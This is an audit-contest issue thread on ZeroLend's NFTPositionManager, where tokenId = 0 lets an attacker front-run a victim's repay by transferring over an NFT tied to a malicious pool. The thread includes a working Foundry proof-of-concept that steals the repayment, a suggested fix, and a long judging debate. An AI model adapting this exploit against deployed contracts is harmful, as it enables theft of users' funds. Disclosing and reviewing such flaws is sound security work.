### ISSUE TITLE
iamnmt - `NFTPositionManager`'s lending functions with `params.tokenId = 0` are vulnerable to front-running

### ISSUE THREAD

**Issue by sherlock-admin3** [sherlock-audit/2024-06-new-scope-judging#59]
iamnmt

High

# `NFTPositionManager`'s lending functions with `params.tokenId = 0` are vulnerable to front-running

### Summary

`NFTPositionManager`'s lending functions do not take a lending pool as an input parameter will cause the users to interact with a malicious pool when setting `params.tokenId = 0` as an attacker will front-run minting a NFT that linked to a malicious pool and then transfer it to the victim.

### Root Cause

`NFTPositionManager`'s lending functions do not take a lending pool as an input parameter.

Although the protocol mitigated the front-run attack vector by implementing an ownership check in every lending function. We believe these mitigation are not enough for the users to use the lending functions with `params.tokenId = 0` safely

```solidity
    if (params.tokenId == 0) {
>>    if (msg.sender != _ownerOf(_nextId - 1)) revert NFTErrorsLib.NotTokenIdOwner();
      params.tokenId = _nextId - 1;
    }
```

https://github.com/sherlock-audit/2024-06-new-scope/blob/c8300e73f4d751796daad3dadbae4d11072b3d79/zerolend-one/contracts/core/positions/NFTPositionManagerSetters.sol#L46-L49

https://github.com/sherlock-audit/2024-06-new-scope/blob/c8300e73f4d751796daad3dadbae4d11072b3d79/zerolend-one/contracts/core/positions/NFTPositionManagerSetters.sol#L66-L69

https://github.com/sherlock-audit/2024-06-new-scope/blob/c8300e73f4d751796daad3dadbae4d11072b3d79/zerolend-one/contracts/core/positions/NFTPositionManagerSetters.sol#L87-L90

https://github.com/sherlock-audit/2024-06-new-scope/blob/c8300e73f4d751796daad3dadbae4d11072b3d79/zerolend-one/contracts/core/positions/NFTPositionManagerSetters.sol#L107-L110

### Internal pre-conditions

A user uses a `NFTPositionManager` lending function with `params.tokenId = 0`.

### Attack Path

The attack vector is viable for every `NFTPositionManager`'s lending functions (`suppy`, `withdraw`, `borrow`, `repay`), here we will demonstrate an attack path for the `repay` function.

1. Alice mints a NFT with `id = 1`, she supplies collateral and borrows `1e18 tokenA`.
2. Alice observes that the last NFT in `NFTPositionManager` is her NFT (the NFT with `id = 1`), so she calls `repay` with `params.tokenId = 0`.
3. The attacker front-run Alice's repay transaction with:
   - Creating a malicious pool that has `tokenA` and a worthless token `attackerToken`.
   - Supplying `1e18 tokenA` directly to the malicious pool.
   - Minting a NFT with `id = 2`, which linked to the malicious pool.
   - Using the NFT with `id = 2` to supply `attackerToken` as collateral, and then borrow `1e18 tokenA`.
   - Tranfering the NFT with `id = 2` to Alice.
4. Alice's repay transaction is executed. She repaid to the NFT with `id = 2` not the NFT with `id = 1`.
5. The attacker withdraws `1e18 tokenA` from the malicious pool and benefits `1e18 tokenA` from Alice.

### Impact

The attacker forced the user to interact with a malicious pool. In case of the `repay` function, the attacker stole all the funds that should be paid to the loan from the user.

### PoC
Run command: `forge test --match-path test/PoC/PoC.t.sol`

```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

import {DataTypes} from 'contracts/core/pool/configuration/DataTypes.sol';
import {IPool} from 'contracts/interfaces/pool/IPool.sol';
import {INFTPositionManager} from 'contracts/interfaces/INFTPositionManager.sol';

import {IERC20} from '@openzeppelin/contracts/token/ERC20/IERC20.sol';
import {ERC20} from '@openzeppelin/contracts/token/ERC20/ERC20.sol';

import {Test, console} from '../../lib/forge-std/src/Test.sol';
import {DeployNFTPositionManager} from 'test/forge/core/positions/DeployNFTPositionManager.t.sol';

contract AttackerToken is ERC20 {
    constructor() ERC20('XYZ', 'XYZ') {
        _mint(msg.sender, 100 ether);
    }
}

contract PoC is DeployNFTPositionManager {
    address alice = makeAddr('alice');
    address attacker = makeAddr('attacker');

    IPool attackerPool;
    IERC20 attackerToken;

    function setUp() public {
        _setUpPool();
        _setup();

        // The attacker created a malicious pool `attackerPool`
        _setupAttackerPool();
    }

    function _setupAttackerPool() internal {
        address[] memory assets = new address[](2);
        assets[0] = address(tokenA);
        // The attacker created a malicious token `attackerToken`
        vm.prank(attacker);
        attackerToken = new AttackerToken();
        assets[1] = address(attackerToken);

        address[] memory rateStrategyAddresses = new address[](2);
        rateStrategyAddresses[0] = address(irStrategy);
        rateStrategyAddresses[1] = address(irStrategy);

        address[] memory sources = new address[](2);
        sources[0] = address(oracleA);
        sources[1] = address(oracleA);

        DataTypes.InitReserveConfig memory config = _basicConfig();

        DataTypes.InitReserveConfig[] memory configurationLocal = new DataTypes.InitReserveConfig[](2);
        configurationLocal[0] = config;
        configurationLocal[1] = config;

        address[] memory admins = new address[](1);
        admins[0] = attacker;

        DataTypes.InitPoolParams memory p = DataTypes.InitPoolParams({
            proxyAdmin: address(this),
            revokeProxy: false,
            admins: admins,
            emergencyAdmins: new address[](0),
            riskAdmins: new address[](0),
            hook: address(0),
            assets: assets,
            rateStrategyAddresses: rateStrategyAddresses,
            sources: sources,
            configurations: configurationLocal
        });

        poolFactory.createPool(p);
        attackerPool = IPool(address(poolFactory.pools(1)));
    }

    function testPoC() public {
        DataTypes.ExtraData memory dummyData = DataTypes.ExtraData(bytes(''), bytes(''));

        _mintAndApprove(attacker, tokenA, 1 ether, address(attackerPool));
        console.log("Attacker tokenA balance before: %e", tokenA.balanceOf(attacker));

        _mintAndApprove(alice, tokenA, 1 ether, address(nftPositionManager));

        // Alice created a NFT with id = 1 to interact with `pool` (this pool is unmalicious)
        {
            vm.prank(alice);
            nftPositionManager.mint(address(pool));

            // Alice borrowed 1e18 tokenA using the NFT with id = 1
            // For the sake of simplicity, the borrowing code is not implemented
        }

        // The attacker front-ran Alice's repay transaction
        {
            vm.startPrank(attacker);
            attackerPool.supplySimple(address(tokenA), attacker, 1 ether, 0);

            // The attacker created a NFT position with id = 2
            nftPositionManager.mint(address(attackerPool));

            // The attacker supplied `attackerToken` to back the borrowing
            attackerToken.approve(address(nftPositionManager), type(uint256).max);
            INFTPositionManager.AssetOperationParams memory paramsSupply =
            INFTPositionManager.AssetOperationParams(address(attackerToken), address(0), 100 ether, 0, dummyData);
            nftPositionManager.supply(paramsSupply);

            // The attacker borrow tokenA from `attackerPool`
            INFTPositionManager.AssetOperationParams memory paramsBorrow =
            INFTPositionManager.AssetOperationParams(address(tokenA), attacker, 1 ether, 0, dummyData);
            nftPositionManager.borrow(paramsBorrow);

            // The attacker tranfer the NFT with id = 2 to Alice
            nftPositionManager.transferFrom(attacker, alice, 2);
            vm.stopPrank();
        }

        // Alice observed the last NFT is her NFT with id = 1
        // so she repaid to the NFT with id = 0
        // Because of the attack, the last NFT is now the NFT with id = 2
        {
            INFTPositionManager.AssetOperationParams memory paramsRepay =
            INFTPositionManager.AssetOperationParams(address(tokenA), address(0), 1 ether, 0, dummyData);

            vm.prank(alice);
            nftPositionManager.repay(paramsRepay);
        }

        vm.prank(attacker);
        attackerPool.withdrawSimple(address(tokenA), attacker, 1 ether, 0);
        console.log("Attacker tokenA balance after: %e", tokenA.balanceOf(attacker));
    }
}
```

Logs:
```bash
  Attacker tokenA balance before: 1e18
  Attacker tokenA balance after: 2e18
```

### Mitigation

Add a lending pool to the input parameters of `NFTPositionManager`'s lending functions, add check against this lending pool when `params.tokenId == 0`

```solidity
    if (params.tokenId == 0) {
      params.tokenId = _nextId - 1;
      if (msg.sender != _ownerOf(params.tokenId) || _positions[params.tokenId].pool != params.pool) revert NFTErrorsLib.NotTokenIdOwner();
    }
```

**Comment by Honour-d-dev** [comment]
Escalate

Invalid issue, calling `supply` `withdraw` `borrow` `repay` with `tokenId == 0` fall under the category of **user mistakes**
It is very clear that this functionality was intended to be used in atomic transactions via the `multi-call`, so a user can mint and deposit , supply, borrow e.t.c. in one transaction .

It's not sensible for a user with an nft to call either functions with tokenId == 0 as it cannot be guaranteed that their nft was the last minted

**Comment by sherlock-admin3** [comment]
> Escalate
> 
> Invalid issue, calling `supply` `withdraw` `borrow` `repay` with `tokenId == 0` fall under the category of **user mistakes**
> It is very clear that this functionality was intended to be used in atomic transactions via the `multi-call`, so a user can mint and deposit , supply, borrow e.t.c. in one transaction .
> 
> It's not sensible for a user with an nft to call either functions with tokenId == 0 as it cannot be guaranteed that their nft was the last minted

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

**Comment by bluenights004** [comment]
This is invalid as it is already a public known-issue reported by Halborn before audit contest starts.

<img width="822" alt="image" src="https://github.com/user-attachments/assets/4df79cb1-5603-4829-81b1-41935459e493">


See link reference: https://github.com/zerolend/audits/blob/main/halborn/Zerolend-One%20Audit.pdf

**Comment by DemoreXTess** [comment]
Escalate 

Known issue thanks @bluenights004 Halborn-7.1

**Comment by sherlock-admin3** [comment]
> Escalate 
> 
> Known issue thanks @bluenights004 Halborn-7.1

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

**Comment by samuraii77** [comment]
That's an issue that was fixed by Halborn. Through doing that, they introduced a new issue, it is not known.

**Comment by 0xjuaan** [comment]
Yeah the subsequent comments are wrong but the initial escalation is correct

**Comment by coffiasd** [comment]
How can the attacker withdraws 1e18 tokenA from the malicious pool while already transfer NFT(id =2) position to Alice ? I think this submission is invalid

**Comment by Vulsight** [comment]
The Halborn audit classified this issue as a critical vulnerability and a remediation was attempted by the team against the vulnerability. The remediation was also vulnerable to the same vulnerability with a more sophisticated attack. This vulnerability allows the attacker to steal the complete funds of the victim user. Considering Halborn's classification of the vulnerability and the attempted fix by the team, I believe this vulnerability is valid and should be classified as high. I have a simpler exploit POC that allows a malicious user to steal all the funds by frontrunning a supply transaction with tokenId == 0: https://github.com/sherlock-audit/2024-06-new-scope-judging/issues/24

**Comment by Vulsight** [comment]
Hi I believe #222 by emmac002 and #505 by denzi_ are wrongly duped with this issue. Both of these issues mention that it is possible to DOS the _supply etc functions with tokenId==0 by frontrunning and minting a new token and causing the victim's transaction to revert.

#222 Summary:
_supply, _borrow, _withdraw, and _repay function calls with tokenID==0 can be DOSED by a user frontrunning the call to mint a NFT which would cause the original call of the user to fail due to not passing the check to see if msg.sender is the owner of _nextId - 1. It basically causes a DOS of 1 block which is considered a invalid finding in sherlock rules.

#505 Summary:
If a person is making a last minute supply call to avoid liquidation with tokenID==0. It could be frontrun with a call to mint a NFT, which would cause their original call to fail due to not passing the NFT ownership check. It refers to a very extremely unlikely scenario where the following conditions have to be satisfied:
1. The NFT was just recently minted (i.e. its the last NFT to be currently minted)
2. Just after the initial borrow, the user is at the risk of liquidation. i.e mere seconds/minutes after the initial borrow, they are at the risk of liquidation.
3. The user then specifically uses the token.id==0 to supply their position.
This makes this attack path impractical as its very unlikely that a user would be at risk of liquidation mere seconds/minutes after their initial NFT creation. Thus it doesn't show even a medium impact. Also this is also DOS of 1 block.

While our issues detail how malicious user can front run this call. In the frontrun bundle, we mint a NFT with a malicious pool and transfer the NFT to the victim user. This would allow the call of the user to pass through successfully due to passing the check of NFT ownership. This will lead to the funds of the user getting diverted to our malicious pool. This allows the malicious user to steal the user funds. 

Both of the mentioned issues cannot be considered dupes for a multitude of reasons but for simplicity we can consider sherlock's simple rule for duplication : "Identify at least a Medium impact"
Which these both issues fail to identify.

**Comment by Honour-d-dev** [comment]
All issues referencing tokenId==0 without a multiCall are invalid and should be grouped as user mistakes, for not specifying the id of their NFT when they have one.

**Comment by 0xDenzi** [comment]
@Vulsight looks like you did not bother reading #505 report clearly and copied all the points from the discord's thread in which the other person backed out and did not want to escalate.

1. All of our cases require the NFT to be minted recently

2. mere seconds/minutes? can you pin point in my report where that is stated? It all depends on the utilization of the protocol and how many new NFTs are minted, if the utilization is low, there might not be new NFTs created for hours.

My report contains 
> After a few hours, Bob's position becomes in danger and he wants to cover his loan with more collateral so they prepare the transaction.

Furthermore [Zerolend's supported Assets](https://docs.zerolend.xyz/overview/assets-listings), you will find that they do accept high volatile assets. Which means frequent and drastic changes in price can happen. 

My report mentions the likelihood to be low while impact to be high, this makes the severity medium according to the rules. Also according to the rules my report contains the correct root cause, a medium or higher impact and fulfills the rules for potential duplicate.

3. All of our cases require the user to input tokenId == 0

@Honour-d-dev when the code allows you to input something and accommodates your input through the code and that piece of code can be used against the user then its not really user mistake. 

User mistakes refer to the user providing inputs which they should not in the first place, such as repaying someone who they did not take a borrow from in the first place.

**Comment by Honour-d-dev** [comment]
@0xDenzi I'll wait until i hear Hoj decision on this first.
From the way i see it it's not sensible to supply with tokenId == 0 when you have an existing NFT and expect the supply to be on your NFT. In reality no sensible user will do this.

**Comment by Vulsight** [comment]
@0xDenzi Considering that the contract is one of central contracts of the entire system that users would be using to manage/create positions. The situation you have described is extremely extremely unlikely.
Also this is DOS of 1 block. The user can then normally supply to their position with the correct tokenID in the next block. A DOS of 1 block is considered invalid as per Sherlock's rules. 

@Honour-d-dev The fact that this was reported as a critical vulnerability and then was attempted to be fixed (incorrectly) by the development team indicates that this is a valid issue which can be exploited by a malicious user. The fix by the team for the Halborn's reported vulnerability tries to ensure that if tokenId == 0 is not owned by the user, then it should revert. Which can be bypassed by the attacker and be used to steal the entirety of funds.

**Comment by Honour-d-dev** [comment]
@Vulsight The point still remains that the exploit depends on a user making a mistake by not providing their tokenId

**Comment by Vulsight** [comment]
@Honour-d-dev Its not a user mistake if the protocol explicitly codes a functionality to cater a very specific scenario i.e. providing tokeniD == 0. If a protocol has catered for such a functionality, the blame is not on the user if they lose any such funds.

**Comment by 0xDenzi** [comment]
> @0xDenzi Considering that the contract is one of central contracts of the entire system that users would be using to manage/create positions. The situation you have described is extremely extremely unlikely.
> 
> Also this is DOS of 1 block. The user can then normally supply to their position with the correct tokenID in the next block. A DOS of 1 block is considered invalid as per Sherlock's rules. 

1. There is no guarantee how many users will be using the protocol, there can be 50 or 5000 or 50000. Again low likelihood does not mean impossible. All of our situations require the last minted NFT to be of the victim, The attack paths can be different. By saying that it is the central contract and there are less chances of the victim's NFT to be the last one due to many users then you are going against your own report. 

2. DoS of 1 block where a call is reverted is invalid, A DoS which leads to a user get liquidated by frontrunning is another thing. Loss of funds are involved so it's not a simple DoS with no harm. 

I do agree with the likelihood of my report to be low but the impact is high which makes this a medium severity case. According to sherlock rules, my issue gets grouped with the rest of the issues and the severity is bumped to high from medium.

**Comment by cvetanovv** [comment]
I agree with the @Honour-d-dev escalation.

There is a vulnerability here. Also, the protocol has fixed the bug reported in the halborn audit, and because of that, this is not a known issue.

What makes this issue invalid is that in order for the vulnerability to happen, the user must make a mistake. Which, according to Sherlock's rules, makes this issue invalid.

As @Honour-d-dev has commented, users can use multi-call. Also, any normal user would specify his ID instead of specifying 0 and then wonder whether he is the last user who minted NFT.

#505 and #222 are invalid for one more reason in addition to the above.

- #222 - DoS for one block is invalid according to Sherlock's rules.
- #505 - If a user waits until the last moment to avoid liquidation, it is his mistake.

The reason this issue is of a critical severity in halborn is that they don't have the user mistake rule. 

Planning to accept the escalation and invalidate the issue.

**Comment by Vulsight** [comment]
According to Sherlock's rules present here:
https://docs.sherlock.xyz/audits/real-time-judging/judging
It is stated that:
"User input validation to prevent user mistakes is not considered a valid issue. However, if a user input could result in a major protocol malfunction or significant loss of funds could be a valid high."

Which in this case results in a significant loss of funds.  Thus this is a valid issue according to sherlock rules.

**Comment by Honour-d-dev** [comment]
> According to Sherlock's rules present here:
> https://docs.sherlock.xyz/audits/real-time-judging/judging
> It is stated that:
> "User input validation to prevent user mistakes is not considered a valid issue. However, if a user input could result in a major protocol malfunction or significant loss of funds could be a valid high."
> 
> Which in this case results in a significant loss of funds.  Thus this is a valid issue according to sherlock rules.

major malfunction or significant loss of funds for the **protocol**

In this case the user input results in only their loss, protocol is not affected

**Comment by Vulsight** [comment]
@Honour-d-dev I don't see "for the protocol" written at the end. Maybe perhaps you could point it out for me?

**Comment by Honour-d-dev** [comment]
> @Honour-d-dev I don't see "for the protocol" written at the end. Maybe perhaps you could point it out for me?
> 

It's common sense, why would someone using a protocol feature incorrectly and loosing their money as a result be a high severity??

**Comment by Joshuajee** [comment]
@Honour-d-dev @cvetanovv ,

The protocol didn't mention anywhere that they plan for this action to be part of a multi-call, so this issue is valid, if this was part of a multi-call the protocol wouldn't validate the owner of the last token. Every design choice or known issue should have been mentioned in the Readme. 

Because the protocol didn't do that, I believe that this should not be judged as a user mistake. 

The flow here is that if I just minted a token, I can call supply with `tokenId = 0`, since I am the owner of the last token, I will be supplying funds for my token. If someone else has minted after me, the supply transaction would revert. 

The protocol clearly supports supplying with tokenId = 0, the only issue here is that a malicious user can steal the user funds by conducting a sophisticated attack.

**Comment by Honour-d-dev** [comment]
@Joshuajee

> The flow here is that if I just minted a token, I can call supply with tokenId = 0, since I am the owner of the last token, I will be supplying funds for my token. If someone else has minted after me, the supply transaction would revert.

Would a rational user call supply with tokenId == 0 and **hope** that that they're the last minter else their transaction reverts

 OR

Call supply with their tokenId and be guaranteed that their transaction will be successful with 0 risk.

There is no logic to justify that behaviour unless the user doesn't have an NFT in which case they use a multi call.

**Comment by Joshuajee** [comment]
@Honour-d-dev 

Design choices are meant to be spelled out in the Readme or in the code comments, the fact that ZeroLend even attempted to fix the issue in this first place, tells you that the protocol had another design in mind.

Zerolend could have easily told Halborn that it is a design choice, that they intend to use it with a multi-call, but they didn't, they attempted a fix that wasn't successful.

The argument to invalidate this is based on the assumption that it was designed to be called with a multi-call, such assumptions have no concrete evidence, and one evidence against it is the fact that Zerolend saw this issue as something worth fixing in the first place. @cvetanovv  I hope you reconsider the issue.

**Comment by Honour-d-dev** [comment]
> Zerolend could have easily told Halborn that it is a design choice, that they intend to use it with a multi-call, but they didn't, they attempted a fix that wasn't successful. 

Or they attempted the fix to prevent users from wrecking themselves by using the feature incorrectly.

> The argument to invalidate this is based on the assumption that it was designed to be called with a multi-call, such assumptions have no concrete evidence

This is false, the argument to invalidate this issue is based on it being a user mistake as explained by @cvetanovv under the sherlock rules.

**Comment by iamnmt** [comment]
@cvetanovv 

It makes sense to use the `supply`, and `borrow` with `mint` in a multi-call (I'm not sure about the `withdraw`). But there is no use case for the `repay` to be used with `mint` in a multi-call. It makes no sense for a user to mint an NFT, borrow, and then repay in the same multi-call without using the borrowed funds. Therefore, I am arguing that the expected functionality is that the `repay` can be used outside the multi-call.

The reports that do not exploit the `repay` functionality should be considered as a user mistake.

**Comment by Joshuajee** [comment]
@Honour-d-dev 

A user mistake occurs when someone goes against the protocol design. If you design something faulty and a user decides to use it, then it is an issue.

**Comment by Honour-d-dev** [comment]
> @cvetanovv 
> 
> It makes sense to use the `supply`, and `borrow` with `mint` in a multi-call (I'm not sure about the `withdraw`). But there is no use case for the `repay` to be used with `mint` in a multi-call. It makes no sense for a user to mint an NFT, borrow, and then repay in the same multi-call without using the borrowed funds. Therefore, I am arguing that the expected functionality is that the `repay` can be used outside the multi-call.
> 
> The reports that do not exploit the `repay` functionality should be considered as a user mistake.

The presence of a multi call in a contract implies that all external/public functions in any order can be used. That doesn't mean they have to be used, it's merely a feature that enables complex batched transactions.

Yes it makes no sense to mint, borrow and repay in the same multi call just as it makes no sense to repay without providing a tokenId. Both cases are examples of users misusing the protocol functionality except in one case they can wreck themselves. 

This does not mean that repay cannot be used in a multi call, but like you mentioned "there's no use case with mint"

**Comment by Honour-d-dev** [comment]
> @Honour-d-dev 
> 
> A user mistake occurs when someone goes against the protocol design. If you design something faulty and a user decides to use it, then it is an issue. 

I believe we're going in circles at this point

**Comment by iamnmt** [comment]
@Honour-d-dev 

> it makes no sense to repay without providing a tokenId

If the last NFT is belong to Alice, then she uses repay with `tokenId = 0` to repay her NFT

> This does not mean that repay cannot be used in a multi call

Execute me. What I mean in my last comment is "But there is no use case for the repay **with `tokenId = 0`** to be used with mint in a multi-call." I do agree that repay can be used in a multi-call.

My argument is:
1. There is `repay` with `tokenId = 0` functionality, so it has to be used somehow
2. There is no use case for `repay` with `tokenId = 0` with `mint` in a multi-call
3. Hence this functionality is expected to be used outside a multi-call
4. When a user uses this functionality outside a multi-call, they will be vulnerable to the above attack. Or if a user uses `repay` with `tokenId = 0` without `mint` inside a multi-call, then they are still vulnerable to this attack.

**Comment by Honour-d-dev** [comment]
@iamnmt 

> If the last NFT is belong to Alice, then she uses repay with tokenId = 0 to repay her NFT

It's impossible to know who the last NFT belongs to outside a **multi-call** due to front-running/race conditions which is a common blockchain concept, so i believe this argument is invalid.

> My argument is:

> 1. There is repay with tokenId = 0 functionality, so it has to be used somehow
> 2. There is no use case for repay with tokenId = 0 with mint in a multi-call
> 3. Hence this functionality is expected to be used outside a multi-call
> 4. When a user uses this functionality outside a multi-call, they will be vulnerable to the above attack. Or if a user uses repay with tokenId = 0 without mint inside a multi-call, then they are still vulnerable to this attack.

Following your logic, there's `mint` ->  `borrow` -> `repay`  multi-call functionality as well, so it has to be used somehow even though it makes no sense. The Point is, because the code allows it does not mean it **must** be used, especially when it makes no sense to do such a thing

**Comment by cvetanovv** [comment]
I completely agree with @Honour-d-dev

We have an issue here, but it is Low severity because of the user mistake rule. 

No normal user would use the function this way. For example, he mints an NFT and, after a certain period of time, decides to call `repay()` with ID = 0 and hopes that he will be the last one to mint the token. Anyone would set their ID, and I'm sure the users writing these issues would do so as well.

My previous decision remains: https://github.com/sherlock-audit/2024-06-new-scope-judging/issues/59#issuecomment-2426574316

**Comment by Prettyfingaz** [comment]
@cvetanovv 
A  simple minded user could think that a  revert would occur, if they happen not to be the last minter. But this finding points out the possibility of an exploit, which will be very much unexpected by users. This should be valid

**Comment by iamnmt** [comment]
@cvetanovv 

> No normal user would use the function this way. 

Then why is there such functionality in the first place? Please give me a use case for repaying with `tokenId = 0`, which is intended to be used.

**Comment by cvetanovv** [comment]
> @cvetanovv
> 
> > No normal user would use the function this way.
> 
> Then why is there such functionality in the first place? Please give me a use case for repaying with `tokenId = 0`, which is intended to be used.

@iamnmt I am not the developer who wrote the contract, and I don't know why it was implemented this way. 

I'll ask the protocol if it can leave a comment about this issue, but I don't know how that will change the fact that this is a user error.

**Comment by samuraii77** [comment]
I don't see why this can be classified as a user error.

Is specifying a token ID of 0 the most optimal and safe decision? No.

Is it a valid decision that should not lead to loss of funds? Yes.

The user does not do anything wrong in this issue, he is simply using what the code allows him to - not having to specify a token ID is a great user experience that many users would want to benefit from and since this leads to loss of funds, it is a valid issue that needs fixing. 

Under circumstances where no bug is in the code, the user would be able to successfully use a token ID of 0, thus this is not actually a user error but a bug in the code. A user error would be when the user specifies `address(0)` as the receiver in some function - this would not work under any circumstances, this is a user error. I believe this differentiation is very important to determine whether something can be classified as a user error or not.

Especially since a usage of a multi call was never mentioned, we can not assume this is the intended use.

**Comment by cvetanovv** [comment]
@samuraii77 I am still awaiting a response from the protocol. I will also consult with the Sherlock team on whether to apply the user mistake rule in this situation.

**Comment by cvetanovv** [comment]
I consulted with HoJ, and my opinion was confirmed.

The fact that a user can specify his own ID of the token and not lose funds means that if he does not do it, it is his own fault, and he is the only person who will lose funds.

If the user does not specify their own token ID, it is the user's own mistake.

> User input validation: User input validation to prevent user mistakes is not considered a valid issue.

My decision is to accept the escalation and invalidate the issue.

**Comment by samuraii77** [comment]
@cvetanovv, if the user will successfully manage to provide a token ID of 0 and everything will work as intended when there is no issue in the code, then how would that be a user mistake? It is only an issue as there is a bug in the code, otherwise it wouldn't be one, I don't see why this can be considered a user mistake.

 It is like saying that if there is a contract with 2 different flows for depositing, one with a bug and one without one, it would be a user mistake to deposit through the one with the bug as he could have used the other one (even though each flow has different benefits or use cases).

The user is going through a completely valid function flow that would work perfectly fine under circumstances with __no bug__. The only reason this flow is considered a user mistake is due to the fact that there is a bug in the code.

TLDR: If something is a user mistake __only__ when there is a bug in the code, then this is not a user mistake, this is a bug in the code. Under circumstances with no bug in the code (expected by users), this would not lead to loss of funds.

**Comment by Joshuajee** [comment]
@cvetanovv,
I agree with @samuraii77 on this the functionality is there for the user to use, so why shouldn't they? 
This doesn't fall under user input validation because this code was built to handle tokenId of zero, there just happens to be a bug there.
Without this bug, would you have categorized this as a user mistake? we are all having this discussion because a bug was found there.

**Comment by Honour-d-dev** [comment]
This is a user mistake, the fact that there's a check if the last token belongs to the user shows that this functionality is supposed to be used in a multi-call.
We all know that it's impossible to guarantee that you are the last minter outside of a multi-call (even if you check before sending the transaction)

No rational user would use this functionality this way

**Comment by Joshuajee** [comment]
@Honour-d-dev,
I would argue that multi-call works perfectly without that check, because you can't frontrun a multi-call, and there is no way someone is minting a position, supplying, borrowing and repaying that loan in a multi-call. The code supports repaying with token id 0.

**Comment by samuraii77** [comment]
> No rational user would use this functionality this way

@Honour-d-dev, then call me irrational but I would definitely use the functionality that way if I knew there was no bug in it. I would do it for the following reasons:
- I don't have to know nor care about the token ID that was minted to me, I just put 0 and let the code take care of it for me
- Reduced gas costs due to usage of PUSH0

**Comment by Honour-d-dev** [comment]
> I don't have to know nor care about the token ID that was minted to me, I just put 0 and let the code take care of it for me

Then your transaction will revert (as I said its impossible to be 100% certain who the last minter is outside multi-call due to race conditions and front-running) and you'll have to care about the token ID and still waste gas

Any rational user would rather just specify their token ID than do this

**Comment by DemoreXTess** [comment]
We should talk the severity here. I believe this conversation is going through unrelevant subject. 

We all know it's forked and it's not a fresh code. The only important thing here is what is the intended behaviour while adding this line into code which can be only answered by the ZeroLend protocol and @cvetanovv already asked to them. 

Additionally, @samuraii77 the last comment from you is just a feature request for the protocol, you can't know the exact reason of those lines if it's not documented in anywhere. It's maybe a multicall functionality or maybe a bug for the users who wants to repay their debt. But now, after asking this to protocol we can't discuss about this issue anymore. I believe @cvetanovv decision is correct here.

**Comment by samuraii77** [comment]
@DemoreXTess, I have never made a feature request, not sure where that came from nor can any of my comments be interpreted as such.

The reason of those lines are clear, they don't need to be documented - if someone provides a token ID of 0, get the last minted token ID. It is also clearly a bug as it was fixed during their last audit showing that this is not intended.

**Comment by DemoreXTess** [comment]
@samuraii77 Sorry, I think I expressed myself wrong. I mean the reasons of using the function in this way which is mentioned by you above can't be accepted as H/M severity.

**Comment by cvetanovv** [comment]
My final decision remains: https://github.com/sherlock-audit/2024-06-new-scope-judging/issues/59#issuecomment-2439894791

It would be a mistake for the user to call the function with `id=0` rather than specifying their own ID.

**Comment by WangSecurity** [comment]
Result:
Invalid 
Has duplicates

**Comment by sherlock-admin4** [comment]
Escalations have been resolved successfully!

Escalation status:
- [Honour-d-dev](https://github.com/sherlock-audit/2024-06-new-scope-judging/issues/59/#issuecomment-2392004839): accepted
- [DemoreXTess](https://github.com/sherlock-audit/2024-06-new-scope-judging/issues/59/#issuecomment-2393247964): rejected
